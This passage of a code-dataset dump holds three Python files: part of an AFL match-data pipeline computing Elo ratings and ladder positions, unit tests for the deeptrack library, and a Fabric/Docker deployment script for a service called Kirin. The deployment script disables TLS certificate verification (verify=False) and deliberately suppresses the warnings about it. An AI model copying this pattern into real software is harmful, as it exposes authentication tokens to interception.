\"\n f\"The offending series is:\\n{data_frame['year']}\"\n )\n\n return data_frame[\"round_number\"].map(\n update_wrapper(partial(_map_round_type, years.iloc[0]), _map_round_type)\n )\n\n\ndef _match_id_column(data_frame: pd.DataFrame) -> pd.Series:\n # AFL Tables match IDs start at 1 and go up, so using 0 & negative numbers\n # for fixture matches will guarantee uniqueness if it ever becomes an issue\n return pd.Series(range(0, -len(data_frame), -1)).astype(str)\n\n\ndef clean_fixture_data(fixture_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Clean, translate, and drop data in preparation for ML-specific transformations.\n\n Params\n ------\n fixture_data (pandas.DataFrame): Raw fixture data\n\n Returns\n -------\n Cleanish pandas.DataFrame\n \"\"\"\n if not fixture_data.size:\n return pd.DataFrame()\n\n fixture_data_frame = (\n fixture_data.rename(columns={\"round\": \"round_number\", \"season\": \"year\"})\n .loc[:, SHARED_MATCH_FIXTURE_COLS]\n .dropna(subset=[\"home_team\", \"away_team\"])\n .assign(\n venue=lambda df: df[\"venue\"].map(_map_footywire_venues),\n round_type=_round_type_column,\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n date=_parse_dates,\n match_id=_match_id_column,\n )\n .fillna(0)\n )\n\n _validate_unique_team_index_columns(fixture_data_frame)\n _validate_canoncial_team_names(fixture_data_frame)\n\n return fixture_data_frame\n\n\ndef clean_match_results_data(data_frame: pd.DataFrame):\n \"\"\"\n Clean and translate match results data to match other other data sets.\n\n Params\n ------\n data_frame: Match results data to be cleaned.\n\n Response\n --------\n Cleanish match results data.\n \"\"\"\n results_data_frame = (\n data_frame.rename(\n columns={\n \"hteam\": \"home_team\",\n \"ateam\": \"away_team\",\n \"hscore\": \"home_score\",\n \"ascore\": \"away_score\",\n \"round\": \"round_number\",\n }\n )\n .dropna(subset=[\"home_team\", \"away_team\"])\n .assign(\n date=_parse_dates,\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n )\n .loc[\n :,\n [\n \"date\",\n \"home_team\",\n \"home_score\",\n \"away_team\",\n \"away_score\",\n \"round_number\",\n \"year\",\n ],\n ]\n )\n\n _validate_unique_team_index_columns(results_data_frame)\n _validate_canoncial_team_names(results_data_frame)\n\n return results_data_frame\n\n\n# Basing Elo calculations on:\n# http://www.matterofstats.com/mafl-stats-journal/2013/10/13/building-your-own-team-rating-system.html\ndef _elo_formula(\n prev_elo_rating: float, prev_oppo_elo_rating: float, margin: int, at_home: bool\n) -> float:\n home_ground_advantage = (\n HOME_GROUND_ADVANTAGE if at_home else HOME_GROUND_ADVANTAGE * -1\n )\n expected_outcome = 1 / (\n 1 + 10 ** ((prev_oppo_elo_rating - prev_elo_rating - home_ground_advantage) / S)\n )\n actual_outcome = X + 0.5 - X ** (1 + (margin / M))\n\n return prev_elo_rating + (K * (actual_outcome - expected_outcome))\n\n\n# Assumes df sorted by year & round_number with ascending=True in order to calculate\n# correct Elo ratings\ndef _calculate_match_elo_rating(\n elo_ratings: EloDictionary,\n # match_row = [year, home_team, away_team, home_margin]\n match_row: np.ndarray,\n) -> EloDictionary:\n match_year = match_row[0]\n\n # It's typical for Elo models to do a small adjustment toward the baseline between\n # seasons\n if match_year != elo_ratings[\"year\"]:\n prematch_team_elo_ratings = (\n elo_ratings[\"current_team_elo_ratings\"] * SEASON_CARRYOVER\n ) + BASE_RATING * (1 - 
SEASON_CARRYOVER)\n else:\n prematch_team_elo_ratings = elo_ratings[\"current_team_elo_ratings\"].copy()\n\n home_team = int(match_row[1])\n away_team = int(match_row[2])\n home_margin = match_row[3]\n\n prematch_home_elo_rating = prematch_team_elo_ratings[home_team]\n prematch_away_elo_rating = prematch_team_elo_ratings[away_team]\n\n home_elo_rating = _elo_formula(\n prematch_home_elo_rating, prematch_away_elo_rating, home_margin, True\n )\n away_elo_rating = _elo_formula(\n prematch_away_elo_rating, prematch_home_elo_rating, home_margin * -1, False\n )\n\n postmatch_team_elo_ratings = prematch_team_elo_ratings.copy()\n postmatch_team_elo_ratings[home_team] = home_elo_rating\n postmatch_team_elo_ratings[away_team] = away_elo_rating\n\n return {\n \"home_away_elo_ratings\": elo_ratings[\"home_away_elo_ratings\"]\n + [(prematch_home_elo_rating, prematch_away_elo_rating)],\n \"current_team_elo_ratings\": postmatch_team_elo_ratings,\n \"year\": match_year,\n }\n\n\ndef add_elo_rating(data_frame_arg: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' prematch Elo ratings.\"\"\"\n ELO_INDEX_COLS = {\"home_team\", \"year\", \"round_number\"}\n REQUIRED_COLS = ELO_INDEX_COLS | {\"home_score\", \"away_score\", \"away_team\", \"date\"}\n\n _validate_required_columns(REQUIRED_COLS, data_frame_arg.columns)\n\n data_frame = (\n data_frame_arg.set_index(list(ELO_INDEX_COLS), drop=False).rename_axis(\n [None] * len(ELO_INDEX_COLS)\n )\n if ELO_INDEX_COLS != {*data_frame_arg.index.names}\n else data_frame_arg.copy()\n )\n\n if not data_frame.index.is_monotonic:\n data_frame.sort_index(inplace=True)\n\n le = LabelEncoder()\n le.fit(data_frame[\"home_team\"])\n time_sorted_data_frame = data_frame.sort_values(\"date\")\n\n elo_matrix = (\n time_sorted_data_frame.assign(\n home_team=lambda df: le.transform(df[\"home_team\"]),\n away_team=lambda df: le.transform(df[\"away_team\"]),\n )\n .eval(\"home_margin = home_score - away_score\")\n .loc[:, [\"year\", \"home_team\", \"away_team\", \"home_margin\"]]\n ).values\n current_team_elo_ratings = np.full(len(set(data_frame[\"home_team\"])), BASE_RATING)\n starting_elo_dictionary: EloDictionary = {\n \"home_away_elo_ratings\": [],\n \"current_team_elo_ratings\": current_team_elo_ratings,\n \"year\": 0,\n }\n\n elo_columns = reduce(\n _calculate_match_elo_rating, elo_matrix, starting_elo_dictionary\n )[\"home_away_elo_ratings\"]\n\n elo_data_frame = pd.DataFrame(\n elo_columns,\n columns=[\"home_elo_rating\", \"away_elo_rating\"],\n index=time_sorted_data_frame.index,\n ).sort_index()\n\n return pd.concat([data_frame, elo_data_frame], axis=1)\n\n\ndef add_out_of_state(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for whether a team is playing out of their home state.\"\"\"\n REQUIRED_COLS = {\"venue\", \"team\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n venue_state = data_frame[\"venue\"].map(lambda x: CITIES[VENUE_CITIES[x]][\"state\"])\n team_state = data_frame[\"team\"].map(lambda x: CITIES[TEAM_CITIES[x]][\"state\"])\n\n return data_frame.assign(out_of_state=(team_state != venue_state).astype(int))\n\n\n# Got the formula from https://www.movable-type.co.uk/scripts/latlong.html\ndef _haversine_formula(\n lat_long1: Tuple[float, float], lat_long2: Tuple[float, float]\n) -> float:\n \"\"\"Calculate distance between two pairs of latitudes & longitudes.\"\"\"\n lat1, long1 = lat_long1\n lat2, long2 = lat_long2\n # Latitude & longitude are in degrees, so have to convert to radians for\n # trigonometric 
functions\n    phi1 = math.radians(lat1)\n    phi2 = math.radians(lat2)\n    delta_phi = phi2 - phi1\n    delta_lambda = math.radians(long2 - long1)\n    a = math.sin(delta_phi / 2) ** 2 + (\n        math.cos(phi1) * math.cos(phi2) * math.sin(delta_lambda / 2) ** 2\n    )\n    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n\n    return EARTH_RADIUS * c\n\n\ndef add_travel_distance(data_frame: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"Append column for distances between teams' home cities and match venue cities.\"\"\"\n    required_cols = {\"venue\", \"team\"}\n    _validate_required_columns(required_cols, data_frame.columns)\n\n    venue_lat_long = data_frame[\"venue\"].map(\n        lambda x: (CITIES[VENUE_CITIES[x]][\"lat\"], CITIES[VENUE_CITIES[x]][\"long\"])\n    )\n    team_lat_long = data_frame[\"team\"].map(\n        lambda x: (CITIES[TEAM_CITIES[x]][\"lat\"], CITIES[TEAM_CITIES[x]][\"long\"])\n    )\n\n    return data_frame.assign(\n        travel_distance=[\n            _haversine_formula(*lats_longs)\n            for lats_longs in zip(venue_lat_long, team_lat_long)\n        ]\n    )\n\n\ndef add_result(data_frame: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"Append a column for teams' match results (win, draw, loss) as float.\"\"\"\n    REQUIRED_COLS = {\"score\", \"oppo_score\"}\n    _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n    wins = (data_frame[\"score\"] > data_frame[\"oppo_score\"]).astype(int)\n    draws = (data_frame[\"score\"] == data_frame[\"oppo_score\"]).astype(int) * 0.5\n\n    return data_frame.assign(result=wins + draws)\n\n\ndef add_margin(data_frame: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"Append a column for teams' points margins from matches.\"\"\"\n    REQUIRED_COLS = {\"score\", \"oppo_score\"}\n    _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n    return data_frame.assign(margin=data_frame[\"score\"] - data_frame[\"oppo_score\"])\n\n\ndef _shift_features(columns: List[str], shift: bool, data_frame: pd.DataFrame):\n    if shift:\n        columns_to_shift = columns\n    else:\n        columns_to_shift = [col for col in data_frame.columns if col not in columns]\n\n    _validate_required_columns(columns_to_shift, data_frame.columns)\n\n    shifted_col_names = {col: f\"prev_match_{col}\" for col in columns_to_shift}\n\n    # Group by team (not team & year) to get final score from previous season for round 1.\n    # This reduces number of rows that need to be dropped and prevents gaps\n    # for cumulative features\n    shifted_features = (\n        data_frame.groupby(\"team\")[columns_to_shift]\n        .shift()\n        .fillna(0)\n        .rename(columns=shifted_col_names)\n    )\n\n    return pd.concat([data_frame, shifted_features], axis=1)\n\n\ndef add_shifted_team_features(\n    shift_columns: List[str] = [], keep_columns: List[str] = []\n):\n    \"\"\"Group features by team and shift by one to get previous match stats.\n\n    Use shift_columns to indicate which features to shift or keep_columns for features\n    to leave unshifted, but not both.\n    \"\"\"\n    if any(shift_columns) and any(keep_columns):\n        raise ValueError(\n            \"To avoid conflicts, you can't include both match_cols \"\n            \"and oppo_feature_cols. 
Choose the shorter list to determine which \"\n \"columns to skip and which to turn into opposition features.\"\n )\n\n shift = any(shift_columns)\n columns = shift_columns if shift else keep_columns\n\n return update_wrapper(partial(_shift_features, columns, shift), _shift_features)\n\n\ndef add_cum_win_points(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' cumulative win points per season.\"\"\"\n REQUIRED_COLS = {\"prev_match_result\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n cum_win_points_col = (\n (data_frame[\"prev_match_result\"] * WIN_POINTS)\n .groupby(level=[TEAM_LEVEL, YEAR_LEVEL])\n .cumsum()\n )\n\n return data_frame.assign(cum_win_points=cum_win_points_col)\n\n\ndef add_win_streak(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' running win/loss streaks.\n\n Streaks calculated through the end of the current match. Positive result\n (win or draw) adds 1 (or 0.5); negative result subtracts 1. Changes in direction\n (i.e. broken streak) result in starting over at 1 or -1.\n \"\"\"\n REQUIRED_COLS = {\"prev_match_result\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n win_groups = data_frame[\"prev_match_result\"].groupby(\n level=TEAM_LEVEL, group_keys=False\n )\n streak_groups = []\n\n for team_group_key, team_group in win_groups:\n streaks: List = []\n\n for idx, result in enumerate(team_group):\n # 1 represents win, 0.5 represents draw\n if result > 0:\n if idx == 0 or streaks[idx - 1] <= 0:\n streaks.append(result)\n else:\n streaks.append(streaks[idx - 1] + result)\n # 0 represents loss\n elif result == 0:\n if idx == 0 or streaks[idx - 1] >= 0:\n streaks.append(-1)\n else:\n streaks.append(streaks[idx - 1] - 1)\n elif result < 0:\n raise ValueError(\n f\"No results should be negative, but {result} \"\n f\"is at index {idx} of group {team_group_key}\"\n )\n else:\n # For a team's first match in the data set or any rogue NaNs, we add 0\n streaks.append(0)\n\n streak_groups.extend(streaks)\n\n return data_frame.assign(\n win_streak=pd.Series(streak_groups, index=data_frame.index)\n )\n\n\ndef add_cum_percent(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' cumulative percentages.\n\n This is an official stat used as a tie-breaker for AFL ladder positions\n and is calculated as cumulative score / cumulative opponents' score.\n \"\"\"\n REQUIRED_COLS = {\"prev_match_score\", \"prev_match_oppo_score\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n cum_score = (\n data_frame[\"prev_match_score\"].groupby(level=[TEAM_LEVEL, YEAR_LEVEL]).cumsum()\n )\n cum_oppo_score = (\n data_frame[\"prev_match_oppo_score\"]\n .groupby(level=[TEAM_LEVEL, YEAR_LEVEL])\n .cumsum()\n )\n\n return data_frame.assign(cum_percent=cum_score / cum_oppo_score)\n\n\ndef add_ladder_position(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' current ladder position.\"\"\"\n REQUIRED_COLS = INDEX_COLS + [\"cum_win_points\", \"cum_percent\"]\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n # Pivot to get round-by-round match points and cumulative percent\n ladder_pivot_table = data_frame[\n INDEX_COLS + [\"cum_win_points\", \"cum_percent\"]\n ].pivot_table(\n index=[\"year\", \"round_number\"],\n values=[\"cum_win_points\", \"cum_percent\"],\n columns=\"team\",\n aggfunc={\"cum_win_points\": np.sum, \"cum_percent\": np.mean},\n )\n\n # To get round-by-round ladder ranks, we sort each round by win points & 
percent,\n # then save index numbers\n ladder_index = []\n ladder_values = []\n\n for year_round_idx, round_row in ladder_pivot_table.iterrows():\n sorted_row = round_row.unstack(level=TEAM_LEVEL).sort_values(\n [\"cum_win_points\", \"cum_percent\"], ascending=False\n )\n\n for ladder_idx, team_name in enumerate(sorted_row.index.to_numpy()):\n ladder_index.append(tuple([team_name, *year_round_idx]))\n ladder_values.append(ladder_idx + 1)\n\n ladder_multi_index = pd.MultiIndex.from_tuples(\n ladder_index, names=tuple(INDEX_COLS)\n )\n ladder_position_col = pd.Series(\n ladder_values, index=ladder_multi_index, name=\"ladder_position\"\n )\n\n return data_frame.assign(ladder_position=ladder_position_col)\n\n\ndef add_elo_pred_win(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for whether teams are predicted to win per their elo ratings.\"\"\"\n REQUIRED_COLS = {\"elo_rating\", \"oppo_elo_rating\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n is_favoured = (data_frame[\"elo_rating\"] > data_frame[\"oppo_elo_rating\"]).astype(int)\n are_even = (data_frame[\"elo_rating\"] == data_frame[\"oppo_elo_rating\"]).astype(int)\n\n # Give half point for predicted draws\n predicted_results = is_favoured + (are_even * 0.5)\n\n return data_frame.assign(elo_pred_win=predicted_results)\n\n\ndef _replace_col_names(at_home: bool):\n team_label = \"home\" if at_home else \"away\"\n oppo_label = \"away\" if at_home else \"home\"\n\n return (\n lambda col: col.replace(\"oppo_\", f\"{oppo_label}_\", 1)\n if re.match(OPPO_REGEX, col)\n else f\"{team_label}_{col}\"\n )\n\n\ndef _match_data_frame(\n data_frame: pd.DataFrame, match_cols: List[str] = [], at_home: bool = True\n) -> pd.DataFrame:\n home_index = \"team\" if at_home else \"oppo_team\"\n away_index = \"oppo_team\" if at_home else \"team\"\n # We drop oppo stats cols, because we end up with both teams' stats per match\n # when we join home and away teams. 
We keep 'oppo_team' and add the renamed column\n # to the index for convenience\n oppo_stats_cols = [\n col\n for col in data_frame.columns\n if re.match(OPPO_REGEX, col) and col != \"oppo_team\"\n ]\n\n return (\n data_frame.query(f\"at_home == {int(at_home)}\")\n # We index match rows by home_team, year, round_number\n .rename(columns={home_index: \"home_team\", away_index: \"away_team\"})\n .drop([\"at_home\"] + oppo_stats_cols, axis=1)\n # We add all match cols to the index, because they don't affect the upcoming\n # concat, and it's easier than creating a third data frame for match cols\n .set_index([\"home_team\", \"away_team\"] + MATCH_INDEX_COLS + match_cols)\n .rename(columns=_replace_col_names(at_home))\n .sort_index()\n )\n","sub_path":"src/augury/pipelines/match/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":22876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"173431240","text":"import sys\nsys.path.append(\"..\") # Adds the module to path\n\nimport unittest\n\nimport deeptrack.features as features\n\nimport numpy as np\nfrom deeptrack.image import Image\n\n\n\nclass TestFeatures(unittest.TestCase):\n\n def test_Feature_1(self):\n class FeatureConcreteClass(features.Feature):\n __distributed__ = False\n def get(self, *args, **kwargs):\n image = np.ones((2, 3))\n return image \n feature = FeatureConcreteClass()\n feature.update()\n output_image = feature.resolve()\n self.assertIsInstance(output_image, Image)\n self.assertEqual(output_image.size, 6)\n \n \n def test_Feature_2(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 1)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1])\n output_image = feature.resolve(output_image)\n self.assertEqual(output_image, 2)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1, 1])\n\n\n def test_Feature_with_dummy_property(self):\n class FeatureConcreteClass(features.Feature):\n __distributed__ = False\n def get(self, *args, **kwargs):\n image = np.ones((2, 3))\n return image \n feature = FeatureConcreteClass(dummy_property=\"foo\")\n feature.update()\n output_image = feature.resolve()\n self.assertListEqual(output_image.get_property(\"dummy_property\", get_one=False), [\"foo\"])\n\n\n def test_Feature_plus_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature1 = FeatureAddValue(value_to_add=1)\n feature2 = FeatureAddValue(value_to_add=2)\n feature = feature1 + feature2\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 3)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1, 2])\n self.assertEqual(output_image.get_property(\"value_to_add\", get_one=True), 1)\n\n\n def test_Feature_plus_2(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n class FeatureMultiplyByValue(features.Feature):\n def get(self, image, value_to_multiply=0, **kwargs):\n image = image * value_to_multiply\n return image\n feature1 = 
FeatureAddValue(value_to_add=1)\n feature2 = FeatureMultiplyByValue(value_to_multiply=10)\n input_image = np.zeros((1, 1))\n feature12 = feature1 + feature2\n feature12.update()\n output_image12 = feature12.resolve(input_image)\n self.assertEqual(output_image12, 10)\n feature21 = feature2 + feature1\n output_image21 = feature21.resolve(input_image)\n self.assertEqual(output_image21, 1)\n\n\n def test_Feature_plus_3(self):\n class FeatureAppendImageOfShape(features.Feature):\n __distributed__ = False\n __list_merge_strategy__ = features.MERGE_STRATEGY_APPEND\n def get(self, *args, shape, **kwargs):\n image = np.zeros(shape)\n return image\n feature1 = FeatureAppendImageOfShape(shape=(1, 1))\n feature2 = FeatureAppendImageOfShape(shape=(2, 2))\n feature12 = feature1 + feature2\n feature12.update()\n output_image = feature12.resolve()\n self.assertIsInstance(output_image, list)\n self.assertIsInstance(output_image[0], Image)\n self.assertIsInstance(output_image[1], Image)\n self.assertEqual(output_image[0].shape, (1, 1))\n self.assertEqual(output_image[1].shape, (2, 2))\n\n\n def test_Feature_times_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n input_image = np.zeros((1, 1))\n feature0 = FeatureAddValue(value_to_add=1) * 0\n feature0.update()\n output_image0 = feature0.resolve(input_image)\n self.assertEqual(output_image0, 0)\n feature1 = FeatureAddValue(value_to_add=1) * 1\n feature1.update()\n output_image1 = feature1.resolve(input_image)\n self.assertEqual(output_image1, 1)\n feature05 = FeatureAddValue(value_to_add=1) * 0.5\n for _ in range(100):\n feature05.update()\n output_image05 = feature05.resolve(input_image)\n self.assertTrue(output_image05[0, 0] == 0 or output_image05[0, 0] == 1)\n\n\n def test_Feature_exp_1(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1) ** 10\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 10)\n \n\n def test_Feature_property_memorability(self):\n class FeatureWithForgettableProperties(features.Feature):\n __property_memorability__ = 2\n def get(self, image, forgettable_property, **kwargs):\n return image\n feature = FeatureWithForgettableProperties(forgettable_property=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertIsNone(output_image.get_property(\"forgettable_property\", default=None))\n output_image = feature.resolve(input_image, property_memorability=2)\n self.assertEqual(output_image.get_property(\"forgettable_property\", default=None), 1)\n\n \n def test_Feature_with_overruled_property(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image, value_to_add=10)\n self.assertEqual(output_image, 10)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [10])\n self.assertEqual(output_image.get_property(\"value_to_add\", get_one=True), 10)\n\n\n\nif __name__ == '__main__':\n 
unittest.main()","sub_path":"test/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645982114","text":"# coding=utf-8\nimport json\nfrom fabric.api import local, run, env, abort, settings, task, execute, roles\nfrom importlib import import_module\nimport abc\nimport requests\nimport time\nfrom retrying import Retrying\nfrom fabric.contrib.files import upload_template as _upload_template\nimport os\n\n\nclass DeploymentManager(object):\n @abc.abstractmethod\n def enable_node(self, node):\n pass\n\n @abc.abstractmethod\n def disable_node(self, node):\n pass\n\n\nclass NoSafeDeploymentManager(DeploymentManager):\n def enable_node(self, node):\n \"\"\" Null impl \"\"\"\n\n def disable_node(self, node):\n \"\"\" Null impl \"\"\"\n\n\ndef convert2bool(v):\n if isinstance(v, bool):\n return v\n return str(v).lower() in (\"yes\", \"y\", \"true\", \"t\", \"1\")\n\n\ndef manage_local():\n if not hasattr(env, \"is_local\"):\n env.is_local = False\n\n if env.is_local:\n env.run_func = local\n else:\n env.run_func = run\n\n\ndef check_node(query, headers=None):\n \"\"\"\n poll on state of execution until it gets a 'succeeded' status\n \"\"\"\n response = None\n try:\n if headers:\n response = requests.get(query, headers=headers, verify=False)\n else:\n response = requests.get(query, verify=False)\n print('waiting for enable node ...')\n except Exception as e:\n print(\"Error : {}\".format(e))\n\n # Return full response\n return response\n\n\nclass SafeDeploymentManager(DeploymentManager):\n # avoid the message output : InsecureRequestWarning: Unverified HTTPS request is being made.\n # Adding certificate verification is strongly advised.\n # See: https://urllib3.readthedocs.io/en/latest/security.html\n requests.packages.urllib3.disable_warnings()\n\n def __init__(self):\n super(SafeDeploymentManager, self).__init__()\n self.http_header = {'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'X-Rundeck-Auth-Token': env.rundeck_token}\n\n def enable_node(self, node):\n node = hostname2node(node)\n print(\"The {} node will be enabled\".format(node))\n\n args = {'argString': '-nodename {} -state enable'.format(node)}\n\n switch_power_on = requests.post(\"{}/api/18/job/{}/run\"\n .format(env.rundeck_url, env.rundeck_job, node),\n headers=self.http_header, data=json.dumps(args), verify=False)\n response = switch_power_on.json()\n\n request = '{}/api/18/execution/{}/state?{}'.format(env.rundeck_url, response['id'], env.rundeck_job)\n\n try:\n Retrying(stop_max_delay=60000, wait_fixed=500,\n retry_on_result=lambda resp: resp is None or\n resp.json().get('executionState') != 'SUCCEEDED')\\\n .call(check_node, request, self.http_header)\n except Exception as e:\n abort(\"The {} node cannot be enabled:\\n{}\".format(node, e))\n\n print(\"The {} node is enabled\".format(node))\n\n def disable_node(self, node):\n node = hostname2node(node)\n print(\"The {} node will be disabled\".format(node))\n\n args = {'argString': '-nodename {} -state disable'.format(node)}\n\n switch_power_off = requests.post(\"{}/api/18/job/{}/run\"\n .format(env.rundeck_url, env.rundeck_job, node),\n headers=self.http_header, data=json.dumps(args), verify=False)\n response = switch_power_off.json()\n\n request = '{}/api/18/execution/{}/state?{}'.format(env.rundeck_url, response['id'], env.rundeck_job)\n\n try:\n Retrying(stop_max_delay=60000, wait_fixed=500,\n retry_on_result=lambda 
resp: resp is None or\n resp.json().get('executionState') != 'SUCCEEDED')\\\n .call(check_node, request, self.http_header)\n except Exception as e:\n abort(\"The {} node cannot be disabled:\\n{}\".format(node, e))\n\n print(\"The {} node is disabled\".format(node))\n\n\ndef deploy_kirin_container_safe(server, node_manager, first_time=False):\n \"\"\" Restart kirin on a specific server,\n in a safe way if load balancers are available\n \"\"\"\n with settings(host_string=server):\n node_manager.disable_node(server)\n dc_filepath = '{path}/docker-compose_kirin.yml'.format(path=env.path)\n migrate(dc_filepath)\n restart(dc_filepath, first_time=first_time)\n test_deployment()\n node_manager.enable_node(server)\n\n\ndef deploy_kirin_beat_container_safe(server, first_time=False):\n \"\"\" Restart kirin on a specific server\n \"\"\"\n with settings(host_string=server):\n dc_filepath = '{path}/docker-compose_kirin-beat.yml'.format(path=env.path)\n restart(dc_filepath, first_time=first_time)\n\n\ndef pull_kirin_image():\n \"\"\"\n Retrieve new kirin image\n \"\"\"\n if not env.is_local:\n env.run_func('docker pull {image}:{new_tag}'.format(image=env.docker_image_kirin, new_tag=env.current_docker_tag))\n\n\ndef update_kirin_docker_tag():\n \"\"\"\n To tag the image, we pull the previous tag, tag it as our own and push it\n \"\"\"\n if not env.is_local:\n local('docker pull {image}:{prev_tag}'\n .format(image=env.docker_image_kirin, prev_tag=env.previous_docker_tag))\n local('docker tag {image}:{prev_tag} {image}:{new_tag}'\n .format(image=env.docker_image_kirin,\n prev_tag=env.previous_docker_tag,\n new_tag=env.current_docker_tag))\n local('docker push {image}:{new_tag}'\n .format(image=env.docker_image_kirin, new_tag=env.current_docker_tag))\n\n\n@task\ndef deploy(first_time=False):\n \"\"\"\n Deploy Kirin services\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n # Unless platform is empty, display status before\n if not first_time:\n print_status()\n update_kirin_docker_tag()\n execute(deploy_kirin, first_time=first_time)\n execute(deploy_kirin_beat, first_time=first_time)\n print_status()\n\n\ndef print_status():\n\n def check_and_print_response(query, header=None):\n response = check_node(query, header)\n if response is None or response.status_code != 200:\n return False\n else:\n print(\"\")\n print(\"curl {}\".format(query))\n print(response.json())\n print(\"\")\n return True\n\n api_root_global = env.kirin_host\n if env.is_local: # for a local deployment, port 80 is not mandatory\n api_root_global = '{}:{}'.format(env.kirin_host, env.kirin_host_port)\n request = 'http://{}/status'.format(api_root_global)\n try:\n Retrying(stop_max_delay=30000, wait_fixed=100,\n retry_on_result=lambda res: not res)\\\n .call(check_and_print_response, request)\n except Exception as e:\n abort(e)\n\n\n@task()\n@roles('kirin-beat')\ndef deploy_kirin_beat(first_time=False):\n \"\"\"\n Deploy Kirin beat\n :return:\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n if len(env.roledefs['kirin-beat']) != 1:\n abort('Error : Only one beat can exist, you provided kirin-beat role on {}'\n .format(env.roledefs['kirin-beat']))\n\n env.docker_nodename = hostname2node(env.host_string)\n upload_template('kirin.env', '{}'.format(env.path), context={'env': env})\n upload_template('docker-compose_kirin-beat.yml', '{}'.format(env.path), context={'env': env})\n\n # Deploy NewRelic\n if env.new_relic_key:\n upload_template('newrelic.ini', '{}'.format(env.path), context={'env': env})\n\n 
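# The enable/disable helpers above poll Rundeck until an execution reaches
# SUCCEEDED. This is the same retrying pattern in isolation; the URL and the
# deadline below are placeholders, not real endpoints.
import requests
from retrying import Retrying


def wait_until_ok(url, timeout_ms=30000):
    # retry_on_result keeps re-calling while the predicate returns True
    return Retrying(
        stop_max_delay=timeout_ms,
        wait_fixed=100,
        retry_on_result=lambda resp: resp is None or resp.status_code != 200,
    ).call(requests.get, url)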
pull_kirin_image()\n\n deploy_kirin_beat_container_safe(env.host_string, first_time=first_time)\n\n # need to wait between both node execution because using same token\n time.sleep(5)\n\n\n@task()\n@roles('kirin')\ndef deploy_kirin(first_time=False):\n \"\"\"\n Deploy Kirin\n :return:\n \"\"\"\n first_time = convert2bool(first_time)\n manage_local()\n\n if env.use_load_balancer:\n node_manager = SafeDeploymentManager()\n else:\n node_manager = NoSafeDeploymentManager()\n\n env.docker_nodename = hostname2node(env.host_string)\n upload_template('kirin.env', '{}'.format(env.path), context={'env': env})\n upload_template('docker-compose_kirin.yml', '{}'.format(env.path), context={'env': env})\n\n # Deploy NewRelic\n if env.new_relic_key:\n upload_template('newrelic.ini', '{}'.format(env.path), context={'env': env})\n\n pull_kirin_image()\n\n deploy_kirin_container_safe(env.host_string, node_manager, first_time=first_time)\n\n # need to wait between both node execution because using same token\n time.sleep(5)\n\n\ndef remove_targeted_image(id_image):\n \"\"\" Remove an image \"\"\"\n with settings(warn_only=True):\n env.run_func('docker rmi {}'.format(id_image))\n\n\ndef remove_targeted_images():\n \"\"\" Remove several images \"\"\"\n images_to_remove = env.run_func(\"docker images | grep kirin | awk '{print $3}' && \"\n \"docker images -f dangling=true -q\")\n for image in images_to_remove.split('\\n'):\n remove_targeted_image(image.strip('\\r'))\n\n\ndef start_container(compose_file):\n \"\"\" Start targeted containers in daemon mode and restart them if crash \"\"\"\n env.run_func('docker-compose -f {} up --force-recreate -d'.format(compose_file))\n\n\ndef stop_container(compose_file):\n \"\"\" Stop targeted containers \"\"\"\n 